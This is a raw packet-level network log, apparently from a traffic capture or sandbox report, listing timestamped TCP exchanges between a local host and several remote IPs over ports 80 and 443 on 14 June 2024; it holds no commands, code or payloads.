          Jun 14, 2024 15:15:08.013422012 CEST44349708188.114.97.3192.168.2.8
          Jun 14, 2024 15:15:08.013442039 CEST44349708188.114.97.3192.168.2.8
          Jun 14, 2024 15:15:08.013456106 CEST49708443192.168.2.8188.114.97.3
          Jun 14, 2024 15:15:08.013462067 CEST44349708188.114.97.3192.168.2.8
          Jun 14, 2024 15:15:08.013479948 CEST49708443192.168.2.8188.114.97.3
          Jun 14, 2024 15:15:08.013523102 CEST49708443192.168.2.8188.114.97.3
          Jun 14, 2024 15:15:08.013614893 CEST44349708188.114.97.3192.168.2.8
          Jun 14, 2024 15:15:08.013638020 CEST44349708188.114.97.3192.168.2.8
          Jun 14, 2024 15:15:08.013712883 CEST49708443192.168.2.8188.114.97.3
          Jun 14, 2024 15:15:08.013717890 CEST44349708188.114.97.3192.168.2.8
          Jun 14, 2024 15:15:08.013772964 CEST49708443192.168.2.8188.114.97.3
          Jun 14, 2024 15:15:08.013808966 CEST44349708188.114.97.3192.168.2.8
          Jun 14, 2024 15:15:08.013825893 CEST44349708188.114.97.3192.168.2.8
          Jun 14, 2024 15:15:08.013878107 CEST49708443192.168.2.8188.114.97.3
          Jun 14, 2024 15:15:08.013883114 CEST44349708188.114.97.3192.168.2.8
          Jun 14, 2024 15:15:08.013894081 CEST49708443192.168.2.8188.114.97.3
          Jun 14, 2024 15:15:08.013936996 CEST49708443192.168.2.8188.114.97.3
          Jun 14, 2024 15:15:08.014014006 CEST44349708188.114.97.3192.168.2.8
          Jun 14, 2024 15:15:08.014029026 CEST44349708188.114.97.3192.168.2.8
          Jun 14, 2024 15:15:08.014081955 CEST49708443192.168.2.8188.114.97.3
          Jun 14, 2024 15:15:08.014086962 CEST44349708188.114.97.3192.168.2.8
          Jun 14, 2024 15:15:08.014120102 CEST49708443192.168.2.8188.114.97.3
          Jun 14, 2024 15:15:08.014138937 CEST49708443192.168.2.8188.114.97.3
          Jun 14, 2024 15:15:08.014206886 CEST44349708188.114.97.3192.168.2.8
          Jun 14, 2024 15:15:08.014224052 CEST44349708188.114.97.3192.168.2.8
          Jun 14, 2024 15:15:08.014281034 CEST49708443192.168.2.8188.114.97.3
          Jun 14, 2024 15:15:08.014285088 CEST44349708188.114.97.3192.168.2.8
          Jun 14, 2024 15:15:08.014318943 CEST49708443192.168.2.8188.114.97.3
          Jun 14, 2024 15:15:08.014337063 CEST49708443192.168.2.8188.114.97.3
          Jun 14, 2024 15:15:08.014411926 CEST44349708188.114.97.3192.168.2.8
          Jun 14, 2024 15:15:08.014427900 CEST44349708188.114.97.3192.168.2.8
          Jun 14, 2024 15:15:08.014480114 CEST49708443192.168.2.8188.114.97.3
          Jun 14, 2024 15:15:08.014484882 CEST44349708188.114.97.3192.168.2.8
          Jun 14, 2024 15:15:08.014516115 CEST49708443192.168.2.8188.114.97.3
          Jun 14, 2024 15:15:08.014533997 CEST49708443192.168.2.8188.114.97.3
          Jun 14, 2024 15:15:08.014595032 CEST44349708188.114.97.3192.168.2.8
          Jun 14, 2024 15:15:08.014647007 CEST44349708188.114.97.3192.168.2.8
          Jun 14, 2024 15:15:08.014688015 CEST49708443192.168.2.8188.114.97.3
          Jun 14, 2024 15:15:08.022727013 CEST49708443192.168.2.8188.114.97.3
          Jun 14, 2024 15:15:08.022742987 CEST44349708188.114.97.3192.168.2.8
          Jun 14, 2024 15:15:13.179838896 CEST4970980192.168.2.893.123.39.71
          Jun 14, 2024 15:15:13.833587885 CEST804970993.123.39.71192.168.2.8
          Jun 14, 2024 15:15:13.833741903 CEST4970980192.168.2.893.123.39.71
          Jun 14, 2024 15:15:13.835041046 CEST4970980192.168.2.893.123.39.71
          Jun 14, 2024 15:15:13.840087891 CEST804970993.123.39.71192.168.2.8
          Jun 14, 2024 15:15:15.517054081 CEST804970993.123.39.71192.168.2.8
          Jun 14, 2024 15:15:15.517138004 CEST804970993.123.39.71192.168.2.8
          Jun 14, 2024 15:15:15.517174006 CEST804970993.123.39.71192.168.2.8
          Jun 14, 2024 15:15:15.517193079 CEST4970980192.168.2.893.123.39.71
          Jun 14, 2024 15:15:15.517206907 CEST804970993.123.39.71192.168.2.8
          Jun 14, 2024 15:15:15.517245054 CEST804970993.123.39.71192.168.2.8
          Jun 14, 2024 15:15:15.517262936 CEST4970980192.168.2.893.123.39.71
          Jun 14, 2024 15:15:15.517282009 CEST804970993.123.39.71192.168.2.8
          Jun 14, 2024 15:15:15.517318010 CEST804970993.123.39.71192.168.2.8
          Jun 14, 2024 15:15:15.517327070 CEST4970980192.168.2.893.123.39.71
          Jun 14, 2024 15:15:15.517353058 CEST804970993.123.39.71192.168.2.8
          Jun 14, 2024 15:15:15.517388105 CEST804970993.123.39.71192.168.2.8
          Jun 14, 2024 15:15:15.517394066 CEST4970980192.168.2.893.123.39.71
          Jun 14, 2024 15:15:15.517420053 CEST804970993.123.39.71192.168.2.8
          Jun 14, 2024 15:15:15.517462015 CEST4970980192.168.2.893.123.39.71
          Jun 14, 2024 15:15:15.517538071 CEST804970993.123.39.71192.168.2.8
          Jun 14, 2024 15:15:15.517573118 CEST804970993.123.39.71192.168.2.8
          Jun 14, 2024 15:15:15.517618895 CEST4970980192.168.2.893.123.39.71
          Jun 14, 2024 15:15:15.517740965 CEST804970993.123.39.71192.168.2.8
          Jun 14, 2024 15:15:15.517802000 CEST4970980192.168.2.893.123.39.71
          Jun 14, 2024 15:15:15.522564888 CEST804970993.123.39.71192.168.2.8
          Jun 14, 2024 15:15:15.522623062 CEST804970993.123.39.71192.168.2.8
          Jun 14, 2024 15:15:15.522627115 CEST4970980192.168.2.893.123.39.71
          Jun 14, 2024 15:15:15.522659063 CEST804970993.123.39.71192.168.2.8
          Jun 14, 2024 15:15:15.522711039 CEST4970980192.168.2.893.123.39.71
          Jun 14, 2024 15:15:15.522768021 CEST804970993.123.39.71192.168.2.8
          Jun 14, 2024 15:15:15.522840977 CEST804970993.123.39.71192.168.2.8
          Jun 14, 2024 15:15:15.522883892 CEST4970980192.168.2.893.123.39.71
          Jun 14, 2024 15:15:15.522897005 CEST804970993.123.39.71192.168.2.8
          Jun 14, 2024 15:15:15.522933006 CEST804970993.123.39.71192.168.2.8
          Jun 14, 2024 15:15:15.522965908 CEST804970993.123.39.71192.168.2.8
          Jun 14, 2024 15:15:15.522977114 CEST4970980192.168.2.893.123.39.71
          Jun 14, 2024 15:15:15.523807049 CEST804970993.123.39.71192.168.2.8
          Jun 14, 2024 15:15:15.523859978 CEST804970993.123.39.71192.168.2.8
          Jun 14, 2024 15:15:15.523864985 CEST4970980192.168.2.893.123.39.71
          Jun 14, 2024 15:15:15.523895979 CEST804970993.123.39.71192.168.2.8
          Jun 14, 2024 15:15:15.523931026 CEST804970993.123.39.71192.168.2.8
          Jun 14, 2024 15:15:15.523961067 CEST4970980192.168.2.893.123.39.71
          Jun 14, 2024 15:15:15.523964882 CEST804970993.123.39.71192.168.2.8
          Jun 14, 2024 15:15:15.524017096 CEST4970980192.168.2.893.123.39.71
          Jun 14, 2024 15:15:15.524705887 CEST804970993.123.39.71192.168.2.8
          Jun 14, 2024 15:15:15.524811029 CEST804970993.123.39.71192.168.2.8
          Jun 14, 2024 15:15:15.524827957 CEST804970993.123.39.71192.168.2.8
          Jun 14, 2024 15:15:15.524844885 CEST804970993.123.39.71192.168.2.8
          Jun 14, 2024 15:15:15.524854898 CEST4970980192.168.2.893.123.39.71
          Jun 14, 2024 15:15:15.524863005 CEST804970993.123.39.71192.168.2.8
          Jun 14, 2024 15:15:15.524883032 CEST4970980192.168.2.893.123.39.71
          Jun 14, 2024 15:15:15.527659893 CEST804970993.123.39.71192.168.2.8
          Jun 14, 2024 15:15:15.527723074 CEST4970980192.168.2.893.123.39.71
          Jun 14, 2024 15:15:15.527832985 CEST804970993.123.39.71192.168.2.8
          Jun 14, 2024 15:15:15.527879953 CEST804970993.123.39.71192.168.2.8
          Jun 14, 2024 15:15:15.527925014 CEST4970980192.168.2.893.123.39.71
          Jun 14, 2024 15:15:15.528143883 CEST804970993.123.39.71192.168.2.8
          Jun 14, 2024 15:15:15.528156996 CEST804970993.123.39.71192.168.2.8
          Jun 14, 2024 15:15:15.528209925 CEST4970980192.168.2.893.123.39.71
          Jun 14, 2024 15:15:15.528486967 CEST804970993.123.39.71192.168.2.8
          Jun 14, 2024 15:15:15.528698921 CEST804970993.123.39.71192.168.2.8
          Jun 14, 2024 15:15:15.528759956 CEST4970980192.168.2.893.123.39.71
          Jun 14, 2024 15:15:15.528902054 CEST804970993.123.39.71192.168.2.8
          Jun 14, 2024 15:15:15.529239893 CEST804970993.123.39.71192.168.2.8
          Jun 14, 2024 15:15:15.529288054 CEST804970993.123.39.71192.168.2.8
          Jun 14, 2024 15:15:15.529289007 CEST4970980192.168.2.893.123.39.71
          Jun 14, 2024 15:15:15.529301882 CEST804970993.123.39.71192.168.2.8
          Jun 14, 2024 15:15:15.529340982 CEST4970980192.168.2.893.123.39.71
          Jun 14, 2024 15:15:15.529675007 CEST804970993.123.39.71192.168.2.8
          Jun 14, 2024 15:15:15.529743910 CEST804970993.123.39.71192.168.2.8
          Jun 14, 2024 15:15:15.529791117 CEST4970980192.168.2.893.123.39.71
          Jun 14, 2024 15:15:15.530085087 CEST804970993.123.39.71192.168.2.8
          Jun 14, 2024 15:15:15.530098915 CEST804970993.123.39.71192.168.2.8
          Jun 14, 2024 15:15:15.530148029 CEST4970980192.168.2.893.123.39.71
          Jun 14, 2024 15:15:15.530436039 CEST804970993.123.39.71192.168.2.8
          Jun 14, 2024 15:15:15.531299114 CEST804970993.123.39.71192.168.2.8
          Jun 14, 2024 15:15:15.531352997 CEST4970980192.168.2.893.123.39.71
          Jun 14, 2024 15:15:15.533735037 CEST804970993.123.39.71192.168.2.8
          Jun 14, 2024 15:15:15.533751011 CEST804970993.123.39.71192.168.2.8
          Jun 14, 2024 15:15:15.533763885 CEST804970993.123.39.71192.168.2.8
          Jun 14, 2024 15:15:15.533776999 CEST804970993.123.39.71192.168.2.8
          Jun 14, 2024 15:15:15.533811092 CEST4970980192.168.2.893.123.39.71
          Jun 14, 2024 15:15:15.533843040 CEST804970993.123.39.71192.168.2.8
          Jun 14, 2024 15:15:15.533853054 CEST4970980192.168.2.893.123.39.71
          Jun 14, 2024 15:15:15.533883095 CEST804970993.123.39.71192.168.2.8
          Jun 14, 2024 15:15:15.533894062 CEST804970993.123.39.71192.168.2.8
          Jun 14, 2024 15:15:15.533921003 CEST4970980192.168.2.893.123.39.71
          Jun 14, 2024 15:15:15.533950090 CEST804970993.123.39.71192.168.2.8
          Jun 14, 2024 15:15:15.533997059 CEST4970980192.168.2.893.123.39.71
          Jun 14, 2024 15:15:15.534288883 CEST804970993.123.39.71192.168.2.8
          Jun 14, 2024 15:15:15.534351110 CEST804970993.123.39.71192.168.2.8
          Jun 14, 2024 15:15:15.534363031 CEST804970993.123.39.71192.168.2.8
          Jun 14, 2024 15:15:15.534373999 CEST804970993.123.39.71192.168.2.8
          Jun 14, 2024 15:15:15.534392118 CEST4970980192.168.2.893.123.39.71
          Jun 14, 2024 15:15:15.534430027 CEST4970980192.168.2.893.123.39.71
          Jun 14, 2024 15:15:15.534832954 CEST804970993.123.39.71192.168.2.8
          Jun 14, 2024 15:15:15.534847021 CEST804970993.123.39.71192.168.2.8
          Jun 14, 2024 15:15:15.534857035 CEST804970993.123.39.71192.168.2.8
          Jun 14, 2024 15:15:15.534872055 CEST804970993.123.39.71192.168.2.8
          Jun 14, 2024 15:15:15.534888983 CEST4970980192.168.2.893.123.39.71
          Jun 14, 2024 15:15:15.534915924 CEST4970980192.168.2.893.123.39.71
          Jun 14, 2024 15:15:15.966860056 CEST4970980192.168.2.893.123.39.71
          Jun 14, 2024 15:15:16.157483101 CEST49710443192.168.2.8188.114.96.3
          Jun 14, 2024 15:15:16.157557964 CEST44349710188.114.96.3192.168.2.8
          Jun 14, 2024 15:15:16.157617092 CEST49710443192.168.2.8188.114.96.3
          Jun 14, 2024 15:15:16.163284063 CEST49710443192.168.2.8188.114.96.3
          Jun 14, 2024 15:15:16.163326979 CEST44349710188.114.96.3192.168.2.8
          Jun 14, 2024 15:15:16.781860113 CEST44349710188.114.96.3192.168.2.8
          Jun 14, 2024 15:15:16.781939030 CEST49710443192.168.2.8188.114.96.3
          Jun 14, 2024 15:15:16.784889936 CEST49710443192.168.2.8188.114.96.3
          Jun 14, 2024 15:15:16.784903049 CEST44349710188.114.96.3192.168.2.8
          Jun 14, 2024 15:15:16.785195112 CEST44349710188.114.96.3192.168.2.8
          Jun 14, 2024 15:15:16.833504915 CEST49710443192.168.2.8188.114.96.3
          Jun 14, 2024 15:15:16.868926048 CEST49710443192.168.2.8188.114.96.3
          Jun 14, 2024 15:15:16.912507057 CEST44349710188.114.96.3192.168.2.8
          Jun 14, 2024 15:15:17.464528084 CEST44349710188.114.96.3192.168.2.8
          Jun 14, 2024 15:15:17.464730978 CEST44349710188.114.96.3192.168.2.8
          Jun 14, 2024 15:15:17.464776993 CEST44349710188.114.96.3192.168.2.8
          Jun 14, 2024 15:15:17.464781046 CEST49710443192.168.2.8188.114.96.3
          Jun 14, 2024 15:15:17.464807987 CEST44349710188.114.96.3192.168.2.8
          Jun 14, 2024 15:15:17.464824915 CEST49710443192.168.2.8188.114.96.3
          Jun 14, 2024 15:15:17.464850903 CEST44349710188.114.96.3192.168.2.8
          Jun 14, 2024 15:15:17.464879990 CEST44349710188.114.96.3192.168.2.8
          Jun 14, 2024 15:15:17.464920044 CEST49710443192.168.2.8188.114.96.3
          Jun 14, 2024 15:15:17.464927912 CEST44349710188.114.96.3192.168.2.8
          Jun 14, 2024 15:15:17.465018988 CEST49710443192.168.2.8188.114.96.3
          Jun 14, 2024 15:15:17.465979099 CEST44349710188.114.96.3192.168.2.8
          Jun 14, 2024 15:15:17.505403042 CEST49710443192.168.2.8188.114.96.3
          Jun 14, 2024 15:15:17.580703974 CEST44349710188.114.96.3192.168.2.8
          Jun 14, 2024 15:15:17.580759048 CEST44349710188.114.96.3192.168.2.8
          Jun 14, 2024 15:15:17.580812931 CEST49710443192.168.2.8188.114.96.3
          Jun 14, 2024 15:15:17.580838919 CEST44349710188.114.96.3192.168.2.8
          Jun 14, 2024 15:15:17.580849886 CEST44349710188.114.96.3192.168.2.8
          Jun 14, 2024 15:15:17.580888987 CEST49710443192.168.2.8188.114.96.3
          Jun 14, 2024 15:15:17.594444036 CEST44349710188.114.96.3192.168.2.8
          Jun 14, 2024 15:15:17.594506025 CEST44349710188.114.96.3192.168.2.8
          Jun 14, 2024 15:15:17.594536066 CEST49710443192.168.2.8188.114.96.3
          Jun 14, 2024 15:15:17.594537973 CEST44349710188.114.96.3192.168.2.8
          Jun 14, 2024 15:15:17.594558001 CEST44349710188.114.96.3192.168.2.8
          Jun 14, 2024 15:15:17.594602108 CEST49710443192.168.2.8188.114.96.3
          Jun 14, 2024 15:15:17.594708920 CEST44349710188.114.96.3192.168.2.8
          Jun 14, 2024 15:15:17.594744921 CEST44349710188.114.96.3192.168.2.8
          Jun 14, 2024 15:15:17.594789982 CEST49710443192.168.2.8188.114.96.3
          Jun 14, 2024 15:15:17.594794035 CEST44349710188.114.96.3192.168.2.8
          Jun 14, 2024 15:15:17.594829082 CEST49710443192.168.2.8188.114.96.3
          Jun 14, 2024 15:15:17.594861031 CEST44349710188.114.96.3192.168.2.8
          Jun 14, 2024 15:15:17.595566988 CEST44349710188.114.96.3192.168.2.8
          Jun 14, 2024 15:15:17.595603943 CEST44349710188.114.96.3192.168.2.8
          Jun 14, 2024 15:15:17.595618010 CEST49710443192.168.2.8188.114.96.3
          Jun 14, 2024 15:15:17.595623016 CEST44349710188.114.96.3192.168.2.8
          Jun 14, 2024 15:15:17.595654011 CEST44349710188.114.96.3192.168.2.8
          Jun 14, 2024 15:15:17.595695972 CEST49710443192.168.2.8188.114.96.3
          Jun 14, 2024 15:15:17.595700979 CEST44349710188.114.96.3192.168.2.8
          Jun 14, 2024 15:15:17.596293926 CEST49710443192.168.2.8188.114.96.3
          Jun 14, 2024 15:15:17.596445084 CEST44349710188.114.96.3192.168.2.8
          Jun 14, 2024 15:15:17.596508980 CEST44349710188.114.96.3192.168.2.8
          Jun 14, 2024 15:15:17.596541882 CEST44349710188.114.96.3192.168.2.8
          Jun 14, 2024 15:15:17.596570015 CEST49710443192.168.2.8188.114.96.3
          Jun 14, 2024 15:15:17.596574068 CEST44349710188.114.96.3192.168.2.8
          Jun 14, 2024 15:15:17.596673012 CEST49710443192.168.2.8188.114.96.3
          Jun 14, 2024 15:15:17.698185921 CEST44349710188.114.96.3192.168.2.8
          Jun 14, 2024 15:15:17.698390961 CEST44349710188.114.96.3192.168.2.8
          Jun 14, 2024 15:15:17.698446035 CEST49710443192.168.2.8188.114.96.3
          Jun 14, 2024 15:15:17.698477983 CEST44349710188.114.96.3192.168.2.8
          Jun 14, 2024 15:15:17.698565960 CEST44349710188.114.96.3192.168.2.8
          Jun 14, 2024 15:15:17.698613882 CEST49710443192.168.2.8188.114.96.3
          Jun 14, 2024 15:15:17.698625088 CEST44349710188.114.96.3192.168.2.8
          Jun 14, 2024 15:15:17.698723078 CEST44349710188.114.96.3192.168.2.8
          Jun 14, 2024 15:15:17.698805094 CEST44349710188.114.96.3192.168.2.8
          Jun 14, 2024 15:15:17.698856115 CEST49710443192.168.2.8188.114.96.3
          Jun 14, 2024 15:15:17.698868990 CEST44349710188.114.96.3192.168.2.8
          Jun 14, 2024 15:15:17.699116945 CEST49710443192.168.2.8188.114.96.3
          Jun 14, 2024 15:15:17.699122906 CEST44349710188.114.96.3192.168.2.8
          Jun 14, 2024 15:15:17.711936951 CEST44349710188.114.96.3192.168.2.8
          Jun 14, 2024 15:15:17.712021112 CEST44349710188.114.96.3192.168.2.8
          Jun 14, 2024 15:15:17.712091923 CEST49710443192.168.2.8188.114.96.3
          Jun 14, 2024 15:15:17.712127924 CEST44349710188.114.96.3192.168.2.8
          Jun 14, 2024 15:15:17.712179899 CEST49710443192.168.2.8188.114.96.3
          Jun 14, 2024 15:15:17.723718882 CEST44349710188.114.96.3192.168.2.8
          Jun 14, 2024 15:15:17.723803043 CEST49710443192.168.2.8188.114.96.3
          Jun 14, 2024 15:15:17.723987103 CEST44349710188.114.96.3192.168.2.8
          Jun 14, 2024 15:15:17.724050045 CEST49710443192.168.2.8188.114.96.3
          Jun 14, 2024 15:15:17.724638939 CEST44349710188.114.96.3192.168.2.8
          Jun 14, 2024 15:15:17.724719048 CEST49710443192.168.2.8188.114.96.3
          Jun 14, 2024 15:15:17.725013018 CEST44349710188.114.96.3192.168.2.8
          Jun 14, 2024 15:15:17.725075006 CEST49710443192.168.2.8188.114.96.3
          Jun 14, 2024 15:15:17.725792885 CEST44349710188.114.96.3192.168.2.8
          Jun 14, 2024 15:15:17.725857019 CEST49710443192.168.2.8188.114.96.3
          Jun 14, 2024 15:15:17.725887060 CEST44349710188.114.96.3192.168.2.8
          Jun 14, 2024 15:15:17.725946903 CEST49710443192.168.2.8188.114.96.3
          Jun 14, 2024 15:15:17.726706982 CEST44349710188.114.96.3192.168.2.8
          Jun 14, 2024 15:15:17.726785898 CEST49710443192.168.2.8188.114.96.3
          Jun 14, 2024 15:15:17.726813078 CEST44349710188.114.96.3192.168.2.8
          Jun 14, 2024 15:15:17.726878881 CEST49710443192.168.2.8188.114.96.3
          Jun 14, 2024 15:15:17.727494001 CEST44349710188.114.96.3192.168.2.8
          Jun 14, 2024 15:15:17.727556944 CEST49710443192.168.2.8188.114.96.3
          Jun 14, 2024 15:15:17.727586985 CEST44349710188.114.96.3192.168.2.8
          Jun 14, 2024 15:15:17.727643967 CEST49710443192.168.2.8188.114.96.3
          Jun 14, 2024 15:15:17.728334904 CEST44349710188.114.96.3192.168.2.8
          Jun 14, 2024 15:15:17.728399992 CEST49710443192.168.2.8188.114.96.3
          Jun 14, 2024 15:15:17.814595938 CEST44349710188.114.96.3192.168.2.8
          Jun 14, 2024 15:15:17.814682007 CEST49710443192.168.2.8188.114.96.3
          Jun 14, 2024 15:15:17.814774990 CEST44349710188.114.96.3192.168.2.8
          Jun 14, 2024 15:15:17.814850092 CEST49710443192.168.2.8188.114.96.3
          Jun 14, 2024 15:15:17.815026045 CEST44349710188.114.96.3192.168.2.8
          Jun 14, 2024 15:15:17.815093040 CEST49710443192.168.2.8188.114.96.3
          Jun 14, 2024 15:15:17.815125942 CEST44349710188.114.96.3192.168.2.8
          Jun 14, 2024 15:15:17.815190077 CEST49710443192.168.2.8188.114.96.3
          Jun 14, 2024 15:15:17.815506935 CEST44349710188.114.96.3192.168.2.8
          Jun 14, 2024 15:15:17.815571070 CEST49710443192.168.2.8188.114.96.3
          Jun 14, 2024 15:15:17.815608978 CEST44349710188.114.96.3192.168.2.8
          Jun 14, 2024 15:15:17.815669060 CEST49710443192.168.2.8188.114.96.3
          Jun 14, 2024 15:15:17.827131987 CEST44349710188.114.96.3192.168.2.8
          Jun 14, 2024 15:15:17.827218056 CEST49710443192.168.2.8188.114.96.3
          Jun 14, 2024 15:15:17.827261925 CEST44349710188.114.96.3192.168.2.8
          Jun 14, 2024 15:15:17.827332020 CEST49710443192.168.2.8188.114.96.3
          Jun 14, 2024 15:15:17.839962006 CEST44349710188.114.96.3192.168.2.8
          Jun 14, 2024 15:15:17.840048075 CEST44349710188.114.96.3192.168.2.8
          Jun 14, 2024 15:15:17.840056896 CEST49710443192.168.2.8188.114.96.3
          Jun 14, 2024 15:15:17.840087891 CEST44349710188.114.96.3192.168.2.8
          Jun 14, 2024 15:15:17.840106010 CEST49710443192.168.2.8188.114.96.3
          Jun 14, 2024 15:15:17.840342999 CEST49710443192.168.2.8188.114.96.3
          Jun 14, 2024 15:15:17.853965998 CEST44349710188.114.96.3192.168.2.8
          Jun 14, 2024 15:15:17.854064941 CEST49710443192.168.2.8188.114.96.3
          Jun 14, 2024 15:15:17.854289055 CEST44349710188.114.96.3192.168.2.8
          Jun 14, 2024 15:15:17.854341030 CEST49710443192.168.2.8188.114.96.3
          Jun 14, 2024 15:15:17.854681015 CEST44349710188.114.96.3192.168.2.8
          Jun 14, 2024 15:15:17.854739904 CEST49710443192.168.2.8188.114.96.3
          Jun 14, 2024 15:15:17.854764938 CEST44349710188.114.96.3192.168.2.8
          Jun 14, 2024 15:15:17.854814053 CEST49710443192.168.2.8188.114.96.3
          Jun 14, 2024 15:15:17.855151892 CEST44349710188.114.96.3192.168.2.8
          Jun 14, 2024 15:15:17.855205059 CEST49710443192.168.2.8188.114.96.3
          Jun 14, 2024 15:15:17.855268955 CEST44349710188.114.96.3192.168.2.8
          Jun 14, 2024 15:15:17.855321884 CEST49710443192.168.2.8188.114.96.3
          Jun 14, 2024 15:15:17.855788946 CEST44349710188.114.96.3192.168.2.8
          Jun 14, 2024 15:15:17.855849981 CEST49710443192.168.2.8188.114.96.3
          Jun 14, 2024 15:15:17.856077909 CEST44349710188.114.96.3192.168.2.8
          Jun 14, 2024 15:15:17.856126070 CEST49710443192.168.2.8188.114.96.3
          Jun 14, 2024 15:15:17.856189966 CEST44349710188.114.96.3192.168.2.8
          Jun 14, 2024 15:15:17.856247902 CEST49710443192.168.2.8188.114.96.3
          Jun 14, 2024 15:15:17.856293917 CEST44349710188.114.96.3192.168.2.8
          Jun 14, 2024 15:15:17.856342077 CEST49710443192.168.2.8188.114.96.3
          Jun 14, 2024 15:15:17.857129097 CEST44349710188.114.96.3192.168.2.8
          Jun 14, 2024 15:15:17.857198954 CEST49710443192.168.2.8188.114.96.3
          Jun 14, 2024 15:15:17.857294083 CEST44349710188.114.96.3192.168.2.8
          Jun 14, 2024 15:15:17.857383966 CEST49710443192.168.2.8188.114.96.3
          Jun 14, 2024 15:15:17.857384920 CEST44349710188.114.96.3192.168.2.8
          Jun 14, 2024 15:15:17.857409954 CEST44349710188.114.96.3192.168.2.8
          Jun 14, 2024 15:15:17.857455969 CEST49710443192.168.2.8188.114.96.3
          Jun 14, 2024 15:15:17.858186007 CEST44349710188.114.96.3192.168.2.8
          Jun 14, 2024 15:15:17.858263016 CEST49710443192.168.2.8188.114.96.3
          Jun 14, 2024 15:15:17.858295918 CEST44349710188.114.96.3192.168.2.8
          Jun 14, 2024 15:15:17.858350992 CEST49710443192.168.2.8188.114.96.3
          Jun 14, 2024 15:15:17.858395100 CEST44349710188.114.96.3192.168.2.8
          Jun 14, 2024 15:15:17.858443975 CEST49710443192.168.2.8188.114.96.3
          Jun 14, 2024 15:15:17.859044075 CEST44349710188.114.96.3192.168.2.8
          Jun 14, 2024 15:15:17.859119892 CEST49710443192.168.2.8188.114.96.3
          Jun 14, 2024 15:15:17.930638075 CEST44349710188.114.96.3192.168.2.8
          Jun 14, 2024 15:15:17.930653095 CEST44349710188.114.96.3192.168.2.8
          Jun 14, 2024 15:15:17.930671930 CEST44349710188.114.96.3192.168.2.8
          Jun 14, 2024 15:15:17.930711985 CEST49710443192.168.2.8188.114.96.3
          Jun 14, 2024 15:15:17.930741072 CEST44349710188.114.96.3192.168.2.8
          Jun 14, 2024 15:15:17.930757046 CEST49710443192.168.2.8188.114.96.3
          Jun 14, 2024 15:15:17.930778980 CEST49710443192.168.2.8188.114.96.3
          Jun 14, 2024 15:15:17.930799961 CEST49710443192.168.2.8188.114.96.3
          Jun 14, 2024 15:15:17.987891912 CEST44349710188.114.96.3192.168.2.8
          Jun 14, 2024 15:15:17.987998009 CEST49710443192.168.2.8188.114.96.3
          Jun 14, 2024 15:15:17.988029003 CEST44349710188.114.96.3192.168.2.8
          Jun 14, 2024 15:15:17.988050938 CEST44349710188.114.96.3192.168.2.8
          Jun 14, 2024 15:15:17.988131046 CEST49710443192.168.2.8188.114.96.3
          Jun 14, 2024 15:15:17.988140106 CEST44349710188.114.96.3192.168.2.8
          Jun 14, 2024 15:15:17.988564968 CEST44349710188.114.96.3192.168.2.8
          Jun 14, 2024 15:15:17.988610983 CEST44349710188.114.96.3192.168.2.8
          Jun 14, 2024 15:15:17.988629103 CEST49710443192.168.2.8188.114.96.3
          Jun 14, 2024 15:15:17.988640070 CEST44349710188.114.96.3192.168.2.8
          Jun 14, 2024 15:15:17.988667965 CEST49710443192.168.2.8188.114.96.3
          Jun 14, 2024 15:15:17.988881111 CEST44349710188.114.96.3192.168.2.8
          Jun 14, 2024 15:15:17.988926888 CEST44349710188.114.96.3192.168.2.8
          Jun 14, 2024 15:15:17.988935947 CEST49710443192.168.2.8188.114.96.3
          Jun 14, 2024 15:15:17.988945961 CEST44349710188.114.96.3192.168.2.8
          Jun 14, 2024 15:15:17.988975048 CEST49710443192.168.2.8188.114.96.3
          Jun 14, 2024 15:15:17.989980936 CEST44349710188.114.96.3192.168.2.8
          Jun 14, 2024 15:15:17.990040064 CEST49710443192.168.2.8188.114.96.3
          Jun 14, 2024 15:15:18.060995102 CEST49710443192.168.2.8188.114.96.3
          Jun 14, 2024 15:15:18.061033964 CEST44349710188.114.96.3192.168.2.8
          Jun 14, 2024 15:15:18.080373049 CEST49713443192.168.2.8188.114.96.3
          Jun 14, 2024 15:15:18.080425024 CEST44349713188.114.96.3192.168.2.8
          Jun 14, 2024 15:15:18.080594063 CEST49713443192.168.2.8188.114.96.3
          Jun 14, 2024 15:15:18.080840111 CEST49713443192.168.2.8188.114.96.3
          Jun 14, 2024 15:15:18.080852032 CEST44349713188.114.96.3192.168.2.8
          Jun 14, 2024 15:15:18.697763920 CEST44349713188.114.96.3192.168.2.8
          Jun 14, 2024 15:15:18.700265884 CEST49713443192.168.2.8188.114.96.3
          Jun 14, 2024 15:15:18.700297117 CEST44349713188.114.96.3192.168.2.8
          Jun 14, 2024 15:15:19.488367081 CEST44349713188.114.96.3192.168.2.8
          Jun 14, 2024 15:15:19.488404989 CEST44349713188.114.96.3192.168.2.8
          Jun 14, 2024 15:15:19.488430977 CEST44349713188.114.96.3192.168.2.8
          Jun 14, 2024 15:15:19.488462925 CEST44349713188.114.96.3192.168.2.8
          Jun 14, 2024 15:15:19.488496065 CEST44349713188.114.96.3192.168.2.8
          Jun 14, 2024 15:15:19.488518953 CEST44349713188.114.96.3192.168.2.8
          Jun 14, 2024 15:15:19.488543034 CEST44349713188.114.96.3192.168.2.8
          Jun 14, 2024 15:15:19.488564968 CEST44349713188.114.96.3192.168.2.8
          Jun 14, 2024 15:15:19.488589048 CEST44349713188.114.96.3192.168.2.8
          Jun 14, 2024 15:15:19.488641977 CEST49713443192.168.2.8188.114.96.3
          Jun 14, 2024 15:15:19.488641977 CEST49713443192.168.2.8188.114.96.3
          Jun 14, 2024 15:15:19.488641977 CEST49713443192.168.2.8188.114.96.3
          Jun 14, 2024 15:15:19.488641977 CEST49713443192.168.2.8188.114.96.3
          Jun 14, 2024 15:15:19.488662958 CEST44349713188.114.96.3192.168.2.8
          Jun 14, 2024 15:15:19.489315987 CEST49713443192.168.2.8188.114.96.3
          Jun 14, 2024 15:15:19.489326000 CEST44349713188.114.96.3192.168.2.8
          Jun 14, 2024 15:15:19.493558884 CEST44349713188.114.96.3192.168.2.8
          Jun 14, 2024 15:15:19.493582964 CEST44349713188.114.96.3192.168.2.8
          Jun 14, 2024 15:15:19.493607044 CEST44349713188.114.96.3192.168.2.8
          Jun 14, 2024 15:15:19.493629932 CEST44349713188.114.96.3192.168.2.8
          Jun 14, 2024 15:15:19.493638039 CEST49713443192.168.2.8188.114.96.3
          Jun 14, 2024 15:15:19.493645906 CEST44349713188.114.96.3192.168.2.8
          Jun 14, 2024 15:15:19.493668079 CEST44349713188.114.96.3192.168.2.8
          Jun 14, 2024 15:15:19.493671894 CEST49713443192.168.2.8188.114.96.3
          Jun 14, 2024 15:15:19.493855953 CEST44349713188.114.96.3192.168.2.8
